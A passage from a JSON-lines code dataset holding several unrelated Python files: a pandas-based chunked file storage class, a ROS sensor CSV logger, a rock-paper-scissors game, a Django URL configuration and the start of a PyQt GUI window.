pd.DataFrame):\n            return self.__gt_df(other)\n        elif isinstance(other, self.__get_seq_type()):\n            return self.__gt_s(other)    \n        else:\n            print(\"Type\", type(other), \"is not supported.\")\n            assert False\n\n    \n\n    def __le_series(self, S):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n\n        seq_type_ = self.__get_seq_type()\n        assert self.row_cnt == len(S)\n        assert all( isinstance(s,seq_type_) for s in S )\n        S_ = self.__get_seqs()\n        B = S_ <= S\n        return B\n\n    \n    def __le_fefs(self, fefs):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n\n        assert self.seq_col == fefs.seq_col\n        assert self.row_cnt == fefs.row_cnt\n        S = fefs.__get_seqs()\n        return self.__le_series(S)\n    \n    \n    def __le_df(self, df):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n\n        assert self.row_cnt == len(df)\n        S = df[self.seq_col]\n        return self.__le_series(S)\n\n\n    def __le_s(self, s):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n\n        S = self.__get_seqs()\n        B = S <= s\n        return B\n    \n\n    def __le__(self, other):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n\n        if isinstance(other, pd.Series):\n            return self.__le_series(other)\n        elif isinstance(other, self.__class__):\n            return self.__le_fefs(other)\n        elif isinstance(other,pd.DataFrame):\n            return self.__le_df(other)\n        elif isinstance(other, self.__get_seq_type()):\n            return self.__le_s(other)\n        else:\n            print(\"Type\", type(other), \"is not supported.\")\n            assert False\n\n\n\n    def __ge_series(self, S):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n\n        seq_type_ = self.__get_seq_type()\n        assert self.row_cnt == len(S)\n        assert all( isinstance(s,seq_type_) for s in S )\n        S_ = self.__get_seqs()\n        B = S_ >= S\n        return B\n    \n\n    def __ge_fefs(self, fefs):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n\n        assert self.seq_col == fefs.seq_col\n        assert self.row_cnt == fefs.row_cnt\n        S = fefs.__get_seqs()\n        return self.__ge_series(S)\n    \n    \n    def __ge_df(self, df):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n\n        assert self.row_cnt == len(df)\n        S = df[self.seq_col]\n        return self.__ge_series(S)\n    \n\n    # def __ge_dt(self, ts):\n    def __ge_s(self, s):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n\n        S = self.__get_seqs()\n        B = S >= s\n        return B\n\n    \n    def __ge__(self, other):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n\n        if isinstance(other, pd.Series):\n            return self.__ge_series(other)\n        elif isinstance(other, self.__class__):\n            return self.__ge_fefs(other)\n        elif isinstance(other, pd.DataFrame):\n            return self.__ge_df(other)\n        elif isinstance(other, self.__get_seq_type()):\n            return self.__ge_s(other)    \n        else:\n            print(\"Type\", type(other), \"is not supported.\")\n            assert False\n    \n    ############################################# Overriding ==, >, <, >=, <=: END #######################################\n    ######################################################################################################################\n\n\n\n    \n    \n    \n    \n\n\n    #####################################################################################################################\n    ################################################# Overriding +: BEG 
#################################################\n def __add_fefs(self, fefs):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n\n assert self.seq_col == fefs.seq_col\n assert len(set(self.colnames) - set(fefs.colnames)) == 0\n assert len(set(fefs.colnames) - set(self.colnames)) == 0\n # assert self.datetime_format == tsfefs.datetime_format\n \n \n # assert not fefs.has_pending_actions()\n \n assert fefs.has_valid_status() # no None in the lists\n assert not fefs.conflict_exist()\n \n \n # the added fefs must be under the current path\n \"\"\"\n fefs = dc(fefs)\n fefs.path = self.__compose_fullpath()\n \"\"\"\n fefs = fefs.clone(self.__compose_fullpath(),fefs.name)\n if fefs.name in self.pieces:\n fefs.name = self.gen_valid_piece(prefix=fefs.name+\"_\", suffix=\"\")\n self.pieces += [fefs.name]\n self.types += [ self.__class__.__name__ ]\n \n self.frs += [None]\n self.tos += [None]\n self.row_cnts += [None]\n self.actions += [\"update\"]\n self.action_params += [None]\n self.dfs += [fefs]\n \n self.include_idx(len(self.pieces)-1) # len(self.pieces)-1: the new highest array idx\n\n return self\n \n\n\n def __add_df(self, df):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n\n assert self.seq_col in df.columns\n assert len(set(self.colnames) - set(df.columns)) == 0\n assert len(set(df.columns) - set(self.colnames)) == 0\n try:\n if self.seq_inv_trans_method is not None:\n assert self.seq_trans_method is not None\n _ = df[self.seq_col].apply(lambda x: self.seq_inv_trans_method(x))\n except:\n print(\"Problem with df's %s\"%self.seq_col)\n assert False\n \n \n \n piece = self.gen_valid_piece(prefix=\"\", suffix=\"\")\n \n \n self.vprint(\"Newly added file:\", piece)\n \n \n self.pieces += [piece]\n self.types += [\"csv\"]\n self.frs += [None]\n self.tos += [None]\n self.row_cnts += [None]\n self.actions += [\"update\"]\n self.action_params += [None]\n self.dfs += [df] # the elements can be df or classes of BaseFEFS\n \n self.include_idx(len(self.pieces)-1) # len(self.pieces)-1: the new highest array idx\n \n return self\n\n \n \n def __add__(self, other):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n\n # print(type(other))\n if isinstance(other, self.__class__):\n return self.__add_fefs(other)\n elif isinstance(other, pd.DataFrame):\n return self.__add_df(other)\n else:\n print(\"Types\", type(other), \"not supported.\")\n assert False\n ################################################# Overriding +: END #################################################\n #####################################################################################################################\n\n\n\n \n \n \n \n \n \n \n \n \n \n \n ####################################################################################################################\n #################################################### MERGE: BEG ####################################################\n # # @classmethod\n # # def merge(cls, left_obj, right_obj, path=\"\", name=\"\", on=\"\", target=None):\n # @staticmethod\n # def merge(left_obj, right_obj, path=\"\", name=\"\", on=\"\", target=None):\n # \"\"\"\n # 1. For class merge, requiring a new path and a new name.\n # 2. The left_obj has to be classes of BaseFEFS.\n # 3. 
The right_obj can be (pd.DataFrame, classes of BaseFEFS)\n # 4. Target is the targeted columns for the right_obj.\n # \"\"\"\n # assert (path is not None) and (name is not None) and (on is not None)\n # assert \"\" not in [path, name, on]\n # assert isinstance(left_obj,classes of BaseFEFS)\n # assert isinstance(right_obj,(classes of BaseFEFS,pd.DataFrame))\n # fefs = left_obj.merge(right_obj, on, target=target, path=path, name=name)\n # return fefs\n\n \n def __get_fefs_reference(self,path,name):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n\n if path is None:\n assert name is None\n fefs = self\n elif path is not None:\n assert name is not None \n fefs = self.clone(path, name)\n else:\n assert False\n return fefs\n \n\n \n def merge_with_df(self, df_another, on, target):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n \"\"\"\n !!!!!!!!!!! Important !!!!!!!!!!!\n I am struggling with the following implementation.\n Ideally, the merge should be done by merging pieces, \n i.e.,\n pd.merge(df_piece, df_another)\n instead of \n pd.merge(self[on], df_another)\n \n This current implementation is for the sake of convenience,\n !!! CHANGE ANYTIME FEELING SLOW !!!\n \"\"\"\n \n # orders = self.__no_overlapping_time_range()\n \n df_self_on = self[on]\n df_another_on = df_another[on+target].drop_duplicates().reset_index(drop=True)\n \n on_col = \"__on__\"\n delim = \"@$*^%\"\n df_self_on[on_col] = df_self_on.apply(lambda x: delim.join([ str(xx) for xx in x ]), axis=1)\n df_self_on = df_self_on[[on_col]]\n df_another_on[on_col] = df_another_on[on].apply(lambda x: delim.join([ str(xx) for xx in x ]), axis=1)\n df_another_on = df_another_on[[on_col] + target]\n \n \"\"\"\n Check 1-to-1\n \"\"\"\n df_uon = df_self_on[[on_col]]\n df_uon = df_uon.drop_duplicates().reset_index(drop=True) \n n = len(df_uon)\n df_one2one = pd.merge(df_uon, df_another_on, on=on_col, how=\"left\").reset_index(drop=True)\n\n # no NA is allowed.\n df_one2one = df_one2one.dropna().reset_index(drop=True)\n assert len(df_one2one) == n \n \n # no duplicate is allowed.\n df_one2one = df_one2one.drop_duplicates().reset_index(drop=True) \n assert len(df_one2one) == n\n\n \n \"\"\"\n real merge\n \"\"\"\n df_target = pd.merge(df_self_on, df_another_on, on=on_col, how=\"left\").reset_index(drop=True)\n # just to reassure\n assert len(df_self_on) == len(df_target)\n \n # the order of df_target must be the same\n for col in target:\n # setting new columns \n assert col not in self.colnames\n self[col] = df_target[col]\n \n return self\n \n \n \n def merge_with_fefs(self, fefs_another, on, target):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n return self.merge_with_df(fefs_another[on+target], on, target)\n\n \n\n def merge(self, right_obj, on, target=None, path=None, name=None):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n \"\"\"\n on: \n (self[on[0]] == right_obj[on[0]]) and \n (self[on[1]] == right_obj[on[1]]) and\n ...\n \n E.g., on=[\"cusID\",\"branch\"]\n \n target:\n - If None then all the remaining cols in right_obj will be merged\n - Else:\n \n E.g., on=[\"cusID\",\"branch\"], target=[\"gender\",\"citizen\"]\n Notice that for a unique comb of on, 
there cannot be more than 1 comb from the targets.\n \"\"\"\n \n \n fefs = self.__get_fefs_reference(path,name)\n\n \n assert isinstance(on,(str,list))\n if isinstance(on,list):\n assert all([ isinstance(col,str) for col in on ])\n else:\n on = [on]\n\n \n if isinstance(right_obj, pd.DataFrame):\n right_cols = list(right_obj.columns)\n elif isinstance(right_obj, self.__class__):\n \"\"\" if classes of BaseFEFS, its seq_col should be a dummy\"\"\"\n right_cols = dc(right_obj.colnames)\n right_cols.remove(right_obj.seq_col)\n else:\n assert False\n\n \n # validity of on\n assert len(set(on) - set(fefs.colnames)) == 0\n assert len(set(on) - set(right_cols)) == 0\n right_cols = list(set(right_cols) - set(on))\n \n\n # validity of target\n if target is not None:\n assert isinstance(target,(str,list))\n if isinstance(target,str):\n target = [target]\n else:\n assert all([ isinstance(col,str) for col in target ])\n assert len(set(target) - set(right_cols)) == 0\n else:\n target = right_cols\n \n\n \n # on and target should be mutually exclusive\n assert len(target) + len(on) == len(set(target+on))\n\n if isinstance(right_obj, pd.DataFrame):\n fefs = fefs.merge_with_df(right_obj, on, target)\n elif isinstance(right_obj, self.__class__):\n fefs = fefs.merge_with_fefs(right_obj, on, target)\n else:\n assert False\n \n return fefs\n #################################################### MERGE: END ####################################################\n ####################################################################################################################\n \n \n \n \n \n \n \n \n \n \n \n \n #####################################################################################################################\n ########################################## conflict resolve, optimize: BEG ##########################################\n \n def conflict_exist(self):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n try:\n _ = self.__no_overlapping_seq_range()\n return False\n except:\n return True\n \n \n def resolve_conflict(self):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n while self.conflict_exist():\n \n df_index, orders = self.dump_index_df() # already sorted by \"fr\"\n self = self.load_index_df(df_index, orders)\n \n for idx in range(len(self.pieces)-1):\n \n \n if self.frs[idx+1] < self.tos[idx]:\n\n df0 = self.dfs[idx]\n if df0 is None:\n df0 = self.__read_piece(idx)\n self.dfs[idx] = df0\n\n df1 = self.dfs[idx+1]\n if df1 is None:\n df1 = self.__read_piece(idx+1)\n self.dfs[idx+1] = df1\n\n B0 = df0[self.seq_col] < self.frs[idx+1]\n df0a = df0[B0].reset_index(drop=True)\n df0b = df0[~B0].reset_index(drop=True)\n\n B1 = df1[self.seq_col] <= self.tos[idx]\n df1a = df1[B1].reset_index(drop=True)\n df1b = df1[~B1].reset_index(drop=True)\n\n self.actions[idx] = \"delete\"\n self.actions[idx+1] = \"delete\"\n\n df_new = pd.concat([df0b,df1a]).reset_index(drop=True)\n df_new = df_new.sort_values(by=self.seq_col).reset_index(drop=True)\n \n if len(df0a) > 0:\n self += df0a\n if len(df1b) > 0:\n self += df1b\n if len(df_new) > 0:\n self += df_new\n break\n \n self.take_actions(max_level=4)\n \n return \n \n\n \n \n def optimize_files(self):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n while True:\n \n 
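# Rebalancing policy, in brief: a piece with row_cnts[idx] >= max_row_per_piece is\n # split; a piece under half the limit is merged into its neighbour when the two\n # together still fit under the limit; each pass re-sorts the index by \"fr\" and\n # repeats until a full scan changes nothing.\n 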
df_index, orders = self.dump_index_df() # already sorted by \"fr\"\n self = self.load_index_df(df_index, orders)\n \n idx = 0\n pieces_len_adjustment = 0\n while idx < len(self.pieces):\n \n if self.row_cnts[idx] >= self.max_row_per_piece:\n self.actions[idx] = \"split\"\n pieces_len_adjustment += 1\n break\n elif self.row_cnts[idx] < self.max_row_per_piece/2:\n idx_next = idx + 1\n if idx_next < len(self.pieces):\n if self.row_cnts[idx_next] + self.row_cnts[idx] < self.max_row_per_piece:\n self.actions[idx] = \"merge\"\n pieces_len_adjustment -= 1\n self.action_params[idx] = idx_next\n elif self.row_cnts[idx_next] > self.max_row_per_piece/2:\n self.actions[idx_next] = \"split\"\n pieces_len_adjustment += 1\n else:\n # better not do anything, leave it alone.\n idx += 1\n continue\n break\n \n idx += 1\n \n # \"split\" is 1, \"merge\" is 2.\n # but since after merge there will be \"delete\", which is 4, s\n # so max_level = 4.\n self.take_actions(max_level=4)\n if idx == len(self.pieces) - pieces_len_adjustment:\n break\n\n return\n\n ########################################## conflict resolve, optimize: END ##########################################\n #####################################################################################################################\n \n \n\n \n \n \n \n \n \n ####################################################################################################################\n ################################################# Read, Write: BEG #################################################\n \"\"\"\n Equals to df.read_csv\n \"\"\"\n def read(self, fullname):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n self.path, self.name = self.__decompose_fullpath(fullname)\n\n full_meta_dict_name = '/'.join([fullname, self.__class__.meta_json_name])\n dict_meta = json.load(open(full_meta_dict_name,'r')) \n self = self.load_meta(dict_meta)\n \n full_index_df_name = '/'.join([fullname, self.__class__.index_df_name])\n if self.seq_read_dtype is None:\n df_index = pd.read_csv(full_index_df_name)\n else:\n df_index = pd.read_csv(full_index_df_name, dtype={\"fr\":self.seq_read_dtype, \"to\":self.seq_read_dtype}) \n self = self.load_index_df(df_index)\n \n self.actions = [ \"\" for i in range(len(df_index)) ]\n self.action_params = [ None for i in range(len(df_index)) ]\n self.dfs = [ None for i in range(len(df_index)) ]\n self.cache = []\n return\n\n \n def write(self, fullname=None):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n if fullname is None:\n fullname = self.__compose_fullpath()\n else:\n self.path, self.name = self.__decompose_fullpath(fullname) # just to ensure the .fefs extension exits\n \n if not os.path.isdir(fullname):\n os.mkdir(fullname)\n \n # Consistency of actions check\n # should have all actions cleared\n assert not self.has_pending_actions()\n\n \n dict_meta = self.dump_meta()\n full_meta_dict_name = '/'.join([fullname, self.__class__.meta_json_name])\n json.dump(dict_meta, open(full_meta_dict_name,'w'))\n \n\n df_index, orders = self.dump_index_df()\n full_index_df_name = '/'.join([fullname, self.__class__.index_df_name])\n df_index.to_csv(full_index_df_name, index=False)\n return\n ################################################# Read, Write: END #################################################\n 
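# Usage sketch for the section above (illustrative only; assumes a concrete\n # subclass such as TSFEFS, since BaseFEFS itself asserts against direct use):\n #\n # fefs = TSFEFS() # hypothetical concrete instance\n # fefs.read(\"data/prices.fefs\") # load meta + index; pieces load lazily\n # fefs += df_new_rows # stage new rows (see __add__ above)\n # fefs.take_actions(max_level=4) # flush pending piece actions\n # fefs.write() # persist meta json + index csv\n 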
####################################################################################################################\n\n \n \n def remove(self):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n fullname = self.__compose_fullpath()\n \n def recursive_remove(fullpath):\n for f in os.listdir(fullpath):\n fullname = \"%s/%s\"%(fullpath,f)\n if os.path.isdir(fullname):\n recursive_remove(fullname)\n else:\n os.remove(fullname)\n os.rmdir(fullpath)\n \n if os.path.isdir(fullname):\n recursive_remove(fullname)\n \n return\n\n\n \n \n \n \n# #####################################################################################################################\n# #################################################### Switch: BEG ####################################################\n# \"\"\" A completely new function \"\"\"\n \n# def switch_seq_col(self, switch_col, path, name):\n\n# \"\"\" \n# Base class should never be actually called,\n# have to be an implemented class.\n# \"\"\"\n# assert self.__class__ != BaseFEFS\n \n \n# assert self.seq_col != switch_col\n# assert switch_col in self.colnames\n \n# # Create a new FEFS in the following\n# dict_meta = self.dump_meta()\n# dict_meta[\"seq_col\"] = switch_col\n \n# assert isinstance(name, str)\n# fefs = TSFEFS.create(dict_meta, name)\n# fefs.path = path\n# fefs_fullpath = fefs.__compose_fullpath()\n# if not os.path.isdir(fefs_fullpath):\n# os.mkdir(fefs_fullpath)\n \n# \"\"\"\n# Explanation:\n# There should be no need to read in the file and changing the seq_col type,\n# since the files should have the seq_col saved as strings.\n\n# Thus a direct copy of the files from src to dst should do.\n# \"\"\" \n# for idx in range(len(self.pieces)):\n \n# piece = self.pieces[idx]\n# type_ = self.types[idx]\n# piece_fullname = self.__compose_piece_fullname(piece)\n \n# if type_ == \"csv\":\n \n# src = piece_fullname\n# dst = '/'.join([fefs_fullpath, piece])\n# os.system(\"cp \\\"%s\\\" \\\"%s\\\"\"%(src,dst))\n \n# elif type_ == self.__class__.__name__:\n \n# sub_self = self.__class__()\n# piece_fullname += '.' 
+ self.__class__.extension\n# sub_self.read(piece_fullname)\n \n# sub_self.switch_seq_col(switch_col, fefs_fullpath, piece)\n \n# else:\n \n# print(\"File type \\\"%s\\\" not yet implemented\"%str(type_))\n# assert False\n","repo_name":"GreekIsGood/TSFEFS","sub_path":"BaseFEFS.old.py","file_name":"BaseFEFS.old.py","file_ext":"py","file_size_in_byte":116442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7314525240","text":"#!/usr/bin/env python3\n\nimport message_filters\nimport rospy\nfrom geometry_msgs.msg import Vector3\nfrom sensor_msgs.msg import Imu\nfrom sonar.msg import Sonar\nfrom nlink_parser.msg import TofsenseFrame0\nimport os\nimport csv\nfrom threading import Lock\n\nclass logger:\n def __init__(self):\n self.filename = None\n self.csvwriter = None\n self.path = None\n self.lock = Lock()\n\n def create_csv_file(self):\n \"\"\"\n If csv file name exists, increment i and use new i in name.\n \"\"\"\n i = 0\n while os.path.exists(self.path + str(i) + \".csv\"):\n i += 1\n self.filename = self.path + str(i)+\".csv\"\n\n def csv_writer(self,write_dict):\n \"\"\"\n Thread lock is used to avoid two callbacks from accessing csvfile at the same time\n \"\"\"\n self.lock.acquire()\n self.csvwriter.writerow(write_dict)\n self.lock.release()\n\n def callback_sonar_tof(self,sonar,tof):\n now = rospy.get_time()\n self.csv_writer({\n \"time\":now,\"sensor\":\"sonar_tof\",\"tof_distance\":tof.dis,\"sonar_distance\":sonar.distance,\"confidence\":sonar.confidence\n })\n rospy.loginfo(sonar)\n rospy.loginfo(tof)\n\n def callback_tof(self,tof):\n now = rospy.get_time()\n self.csv_writer({\n \"time\":now,\"sensor\":\"tof\",\"tof_distance\":tof.dis\n })\n rospy.loginfo(tof)\n\n def callback_sonar_distance(self,sonar):\n now = rospy.get_time()\n self.csv_writer({\n \"time\":now,\"sensor\":\"sonar\",\"sonar_distance\":sonar.distance,\"confidence\":sonar.confidence\n })\n rospy.loginfo(sonar)\n \n def callback_sonar_profile(self,sonar):\n now = rospy.get_time()\n self.csv_writer({\n \"time\":now,\"sensor\":\"sonar\",\"sonar_distance\":sonar.distance,\"confidence\":sonar.confidence,\n \"transmit_duration\":sonar.transmit_duration,\"ping_number\":sonar.ping_number,\n \"scan_start\":sonar.scan_start,\"scan_length\":sonar.scan_length,\"gain_setting\":sonar.gain_setting,\n \"profile_data\":[sonar.profile_data[i] for i in range(0,len(sonar.profile_data))],\n })\n rospy.loginfo(sonar)\n \n \n def callback_imu(self,imu):\n now = rospy.get_time()\n self.csv_writer({\n \"time\":now,\"sensor\":\"imu\",\n \"accel x\":imu.linear_acceleration.x,\"accel y\":imu.linear_acceleration.y,\"accel z\":imu.linear_acceleration.z,\n \"angular_vel x\":imu.angular_velocity.x,\"angular_vel y\":imu.angular_velocity.y,\"angular_vel z\":imu.angular_velocity.z,\n })\n rospy.loginfo(imu)\n\n def start(self):\n rospy.init_node(\"logger\",anonymous=True)\n self.path = rospy.get_param(\"~csv_path\",\"/home/ubuntu/all_log_\")\n self.mode = rospy.get_param(\"~mode\",\"all\")\n self.create_csv_file()\n with open(self.filename,\"w\") as csvfile:\n if self.mode == \"all\":\n header = [\"time\",\"sensor\",\"tof_distance\",\"sonar_distance\",\"confidence\",\"accel x\",\"accel y\",\"accel z\",\"angular_vel x\",\"angular_vel y\",\"angular_vel z\"]\n self.csvwriter = csv.DictWriter(csvfile,fieldnames = header)\n self.csvwriter.writeheader()\n imu_sub = rospy.Subscriber(\"/imu/data_raw\",Imu,self.callback_imu,queue_size=1)\n\n # Code below is to time synchronize sonar and tof 
mesurements\n sonar_sub = message_filters.Subscriber('/sonar', Sonar)\n tof_sub = message_filters.Subscriber('/nlink_tofsense_frame0',TofsenseFrame0)\n ts = message_filters.ApproximateTimeSynchronizer([sonar_sub,tof_sub],1,0.01,allow_headerless=True)\n ts.registerCallback(self.callback_sonar_tof)\n \n elif self.mode == \"imu_tof\":\n header = [\"time\",\"sensor\",\"tof_distance\",\"accel x\",\"accel y\",\"accel z\",\"angular_vel x\",\"angular_vel y\",\"angular_vel z\"]\n self.csvwriter = csv.DictWriter(csvfile,fieldnames = header)\n self.csvwriter.writeheader()\n imu_sub = rospy.Subscriber(\"/imu/data_raw\",Imu,self.callback_imu)\n tof_sub = rospy.Subscriber('/nlink_tofsense_frame0',TofsenseFrame0,self.callback_tof)\n\n elif self.mode == \"imu\":\n header = [\"time\",\"sensor\",\"accel x\",\"accel y\",\"accel z\",\"angular_vel x\",\"angular_vel y\",\"angular_vel z\"]\n self.csvwriter = csv.DictWriter(csvfile,fieldnames = header)\n self.csvwriter.writeheader()\n imu_sub = rospy.Subscriber(\"/imu/data_raw\",Imu,self.callback_imu)\n \n elif self.mode == \"sonar\":\n header = [\"time\",\"sensor\",\"sonar_distance\",\"confidence\",\"transmit_duration\",\"ping_number\",\"scan_start\",\"scan_length\",\"gain_setting\",\"profile_data\"]\n self.csvwriter = csv.DictWriter(csvfile,fieldnames = header)\n self.csvwriter.writeheader()\n sonar_sub = rospy.Subscriber('/sonar', Sonar,self.callback_sonar_profile)\n \n elif self.mode == \"tof\":\n header = [\"time\",\"sensor\",\"tof_distance\"]\n self.csvwriter = csv.DictWriter(csvfile,fieldnames = header)\n self.csvwriter.writeheader()\n tof_sub = rospy.Subscriber('/nlink_tofsense_frame0',TofsenseFrame0,self.callback_tof)\n rospy.spin()\n \n\nif __name__ == \"__main__\":\n try:\n log = logger().start()\n except rospy.ROSInterruptException:\n pass\n","repo_name":"SAAB-NTU/2023_UWR","sub_path":"ros_ws/src/Rpi_logger_v2/src/logger/scripts/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":5611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34011828264","text":"import random\n\ndef gamewin(comp,you):\n if comp==you:\n return 'Tie'\n elif comp=='s':\n if you=='c':\n return False\n elif you=='p':\n return True\n elif comp=='p':\n if you=='s':\n return False\n elif you=='c':\n return True\n elif comp=='c':\n if you=='p':\n return False\n elif you=='s':\n return True\n else:\n return None\n\ndef main():\n try:\n you = input(\"Your Turn : Stone(s),Paper(p),Scissor(c) : \\n\").lower()\n print(\"Computer's Turn : Stone(s),Paper(p),Scissor(c) : \")\n no = random.randint(1,3)\n if no==1:\n comp='s'\n elif no==2:\n comp='p'\n elif no==3:\n comp='c'\n\n print(\"Computer Choose : \",comp)\n print(\"You Choose : \",you)\n\n x=gamewin(comp,you)\n\n if x=='Tie':\n print(\"Game is Tie...\")\n elif x: \n print(\"You Win !, Congratulations.\")\n elif x==None:\n print(\"Please Enter Valid Input !!\")\n main()\n else:\n print(\"You Lose. 
Better Luck Next Time..\")\n except:\n print(\"Please Enter Valid Input !!\")\n main()\n\nmain()","repo_name":"akash-hirapara/Stone-Paper-Scissor-Game","sub_path":"Stone Paper Scissor.py","file_name":"Stone Paper Scissor.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31218629043","text":"# Custom patches\nimport patches\nfrom os.path import join, dirname\n\nfrom django.conf import settings\nfrom django.conf.urls.defaults import *\nfrom django.contrib import admin\nfrom django.contrib.sitemaps import FlatPageSitemap, GenericSitemap\nfrom django.http import HttpResponseServerError\nfrom django.template.context import RequestContext, Context\nfrom django.template.loader import render_to_string\n\nfrom discussion.views import redirect_to_view\nfrom tagging.models import Tag\nfrom blog.sitemaps import BlogSitemap, IndexSitemap, BlogTagsSitemap\nfrom lib import appcheck\n\ndef error500(request, template_name='500.html'):\n try:\n output = render_to_string(template_name, {}, RequestContext(request))\n except:\n output = \"Critical error. Administrator was notified.\"\n return HttpResponseServerError(output)\n\nhandler500 = 'urls.error500'\n\nsitemaps = {\n 'blog' : BlogSitemap,\n 'blogtags': BlogTagsSitemap,\n 'flat' : FlatPageSitemap,\n 'index' : IndexSitemap,\n}\n\ntry:\n import urls_local\n urlpatterns = urls_local.urlpatterns\nexcept ImportError:\n urlpatterns = patterns('',)\n\nadmin.autodiscover()\n\nurlpatterns += patterns(\n '',\n url(r'' , include('revcanonical.urls')),\n url(r'^admin/postimage/' , include('postimage.urls')),\n url(r'^admin/filebrowser/' , include('filebrowser.urls')),\n \n url(r'^admin/?(.*)' , admin.site.root, name='admin'),\n \n url(r'^accounts/' , include('accounts.urls')),\n url(r'^crossposting/' , include('crossposting.urls')),\n url(r'^openid/' , include('openidconsumer.urls')),\n url(r'^openidserver/' , include('openidserver.urls')),\n url(r'^%s' % settings.BLOG_URLCONF_ROOT , include('blog.urls')),\n url(r'^sitemap.xml$' , 'django.contrib.sitemaps.views.sitemap', {'sitemaps': sitemaps}),\n url(r'^xmlrpc/' , include('xmlrpc.urls')),\n url(r'^captcha/' , include('captcha.urls')),\n url(r'^robots.txt$' , include('robots.urls')),\n url(r'^feeds/' , include('feed.urls')),\n \n #mark coomment node as viewd and redirect to admin comment edit page\n url(r'^commentnode/viewed/(?P[\\d]+)/?', redirect_to_view, name='mark-comments-read'),\n \n # tinymce and admin page for blog post must on the same domain\n url(r'^tinymce/' , include('tinymce.urls')),\n)\n\nif appcheck.watchlist:\n urlpatterns += patterns('', url(r'^watchlist/', include('watchlist.urls')),)\n\nif appcheck.friends:\n urlpatterns += patterns('', url(r'^friends/', include('friends.urls')),)\n\nif settings.URL_ROOT_HANDLER:\n urlpatterns += patterns('', url(r'^$', settings.URL_ROOT_HANDLER))\n\nif appcheck.wpimport:\n urlpatterns += patterns('', url(r'^wpimport/', include('wpimport.urls')),)\n\nif appcheck.debug:\n urlpatterns += patterns('', url('', include('debug.urls')),)\n\nif appcheck.life:\n urlpatterns += patterns('', url(r'^life/', include('life.urls')),)\n\n# static pages URLs\nurlpatterns += patterns('', url(r'^/?', include('staticpages.urls')),)\n","repo_name":"gvidon/blombum","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3402,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"25398507374","text":"# 
IMPORT QT CORE\nfrom qt_core import *\n\n# IMPORT MAIN WINDOW\nfrom gui.windows.main_window.ui_main_window import UI_MainWindow\n\n# GUI FILE\nfrom gui.windows.window_loading.ui_splash_screen import Ui_SplashScreen\nfrom codigo.contagem_e_corte import Contagem\n\n# GLOBALS\ncounter = 0\njumper = 10\n\n\n## ==> MAIN WINDOW <== ##\nclass MainWindow(QMainWindow):\n def __init__(self):\n super().__init__()\n\n self.setWindowTitle(\"PROJETO BETA IA\")\n\n # SETUP MAIN WINDOW\n self.ui = UI_MainWindow()\n self.ui.setup_ui(self)\n\n # Toggle button\n self.ui.toggle_button.clicked.connect(self.toggle_button)\n\n # Btn home\n self.ui.btn_1.clicked.connect(self.show_page_1)\n\n # Btn widgets\n self.ui.btn_2.clicked.connect(self.show_page_2)\n\n # Btn settings\n self.ui.settings_btn.clicked.connect(self.show_page_3)\n\n # Btn Treinamento\n self.ui.btn_3.clicked.connect(self.show_page_4)\n\n # Change text\n self.ui.ui_pages.btn_change_text.clicked.connect(self.change_text)\n\n # button_select_image\n self.ui.ui_pages.pushButton_5.clicked.connect(self.select_image)\n\n\n # SHOW OUR APPLICATION\n self.show()\n\n # Change text - Home 